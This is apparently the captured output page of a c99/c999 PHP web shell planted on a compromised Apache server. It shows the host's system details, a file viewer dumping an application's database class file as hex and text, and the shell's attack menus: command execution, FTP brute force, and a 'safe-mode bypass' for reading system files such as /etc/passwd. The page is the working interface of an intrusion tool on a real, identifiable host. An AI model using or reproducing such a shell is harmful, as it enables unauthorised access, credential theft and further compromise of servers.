!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/reportEregis111/classes/   drwxr-xr-x
Free 52.38 GB of 127.8 GB (40.99%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     clsquery.php (755 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Information:
Path /var/www/html/reportEregis111/classes/clsquery.php
Size 755 B
MD5 a3603afc9bb09faf1a39d31e034878ff
Owner/Group root/root
Perms-rw-r--r--
Create time 13/02/2021 08:32:50
Access time 30/07/2024 15:09:08
MODIFY time 13/06/2011 13:30:01

FULL HEXDUMP
00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
00000240
00000258
00000270
00000288
000002A0
000002B8
000002D0
000002E8
3C 3F 70 68 70 20 0A 63 6C 61 73 73 20 71 72 79 20 20 65 78 74 65 6E 64
73 20 63 6C 73 44 42 7B 0A 76 61 72 20 24 72 65 73 75 6C 74 3B 0A 76 61
72 20 24 63 6F 6C 73 3B 0A 0A 09 66 75 6E 63 74 69 6F 6E 20 71 72 79 28
26 24 63 29 7B 0A 09 09 24 74 68 69 73 2D 3E 63 3D 24 63 2D 3E 63 3B 0A
09 09 24 74 68 69 73 2D 3E 44 42 3D 24 63 2D 3E 64 62 3B 0A 09 7D 0A 0A
09 66 75 6E 63 74 69 6F 6E 20 71 75 65 72 79 28 24 53 71 6C 29 7B 0A 09
2F 2F 64 6F 51 75 65 72 79 20 E0 BB E7 B9 BF D1 A7 A1 EC AA D1 E8 B9 B7
D5 E8 C3 D1 BA A4 D3 CA D1 E8 A7 20 53 65 6C 65 63 74 20 E0 BE D7 E8 CD
C3 CD A7 C3 D1 BA A1 D2 C3 20 6A 6F 69 6E 20 B5 D2 C3 D2 A7 20 BE C3 E9
CD C1 B7 D1 E9 A7 CA C3 E9 D2 A7 B5 D1 C7 E1 BB C3 A4 C5 D2 CA B5 D2 C1
A8 D3 B9 C7 B9 BF D4 C5 B4 EC B7 D5 E8 20 53 65 6C 65 63 74 0A 09 09 24
74 68 69 73 2D 3E 53 65 74 51 75 65 72 79 28 24 53 71 6C 29 3B 0A 09 09
24 74 68 69 73 2D 3E 63 6F 6C 73 20 3D 20 24 74 68 69 73 2D 3E 4E 75 6D
46 69 65 6C 64 28 29 3B 0A 09 09 66 6F 72 20 28 24 69 3D 30 3B 20 24 69
3C 24 74 68 69 73 2D 3E 63 6F 6C 73 3B 20 24 69 2B 2B 29 7B 0A 09 09 09
65 76 61 6C 28 22 5C 24 74 68 69 73 2D 3E 22 2E 24 74 68 69 73 2D 3E 46
69 65 6C 64 4E 61 6D 65 28 24 69 29 2E 22 3D 27 27 3B 22 29 3B 0A 09 09
7D 0A 09 7D 0A 0A 09 66 75 6E 63 74 69 6F 6E 20 47 65 74 52 65 63 6F 72
64 28 29 7B 0A 09 2F 2F 47 65 74 52 65 63 6F 72 64 20 E0 BB E7 B9 BF D1
A7 A1 EC AA D1 E8 B9 B9 D3 A4 E8 D2 B7 D5 E8 E4 B4 E9 A8 D2 A1 A1 D2 C3
E0 CD E7 A1 AB D5 A4 D4 C7 C1 D2 A1 D3 CB B9 B4 A4 E8 D2 E3 CB E9 A1 D1
BA B5 D1 C7 E1 BB C3 A2 CD A7 A4 C5 D2 CA 0A 09 09 69 66 28 24 74 68 69
73 2D 3E 72 65 73 75 6C 74 20 3D 20 24 74 68 69 73 2D 3E 47 65 74 52 65
73 75 6C 74 28 29 29 7B 0A 09 09 09 66 6F 72 20 28 24 69 3D 30 3B 20 24
69 3C 24 74 68 69 73 2D 3E 63 6F 6C 73 3B 20 24 69 2B 2B 29 7B 0A 09 09
09 09 65 76 61 6C 28 22 5C 24 74 68 69 73 2D 3E 22 2E 24 74 68 69 73 2D
3E 46 69 65 6C 64 4E 61 6D 65 28 24 69 29 2E 22 3D 5C 24 74 68 69 73 2D
3E 72 65 73 75 6C 74 5B 27 22 2E 24 74 68 69 73 2D 3E 46 69 65 6C 64 4E
61 6D 65 28 24 69 29 2E 22 27 5D 3B 22 29 3B 0A 09 09 09 7D 0A 09 09 09
72 65 74 75 72 6E 20 31 3B 0A 09 09 7D 0A 09 09 65 6C 73 65 7B 0A 09 09
09 72 65 74 75 72 6E 20 30 3B 0A 09 09 7D 0A 09 7D 0A 7D 20 2F 2F 63 6C
61 73 73 20 71 72 79 0A 3F 3E 0A
<?php  class qry  extend
s clsDB{ var $result; va
r $cols;   function qry(
&$c){  $this->c=$c->c; 
$this->DB=$c->db;  }  
function query($Sql){ 
//doQuery เป็นฟังก์ชั่นท
ี่รับคำสั่ง Select เพื่อ
รองรับการ join ตาราง พร้
อมทั้งสร้างตัวแปรคลาสตาม
จำนวนฟิลด์ที่ Select  $
this->SetQuery($Sql); 
$this->cols = $this->Num
Field();  for ($i=0; $i
<$this->cols; $i++){ 
eval("\$this->".$this->F
ieldName($i)."='';"); 
}  }   function GetRecor
d(){  //GetRecord เป็นฟั
งก์ชั่นนำค่าที่ได้จากการ
เอ็กซีคิวมากำหนดค่าให้กั
บตัวแปรของคลาส  if($thi
s->result = $this->GetRe
sult()){  for ($i=0; $
i<$this->cols; $i++){ 
eval("\$this->".$this-
>FieldName($i)."=\$this-
>result['".$this->FieldN
ame($i)."'];");  } 
return 1;  }  else{ 
return 0;  }  } } //cl
ass qry ?> 

HEXDUMP: [Full] [Preview]
Base64:
[Encode [+chunk [+chunk+quotes [Decode


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0081 ]--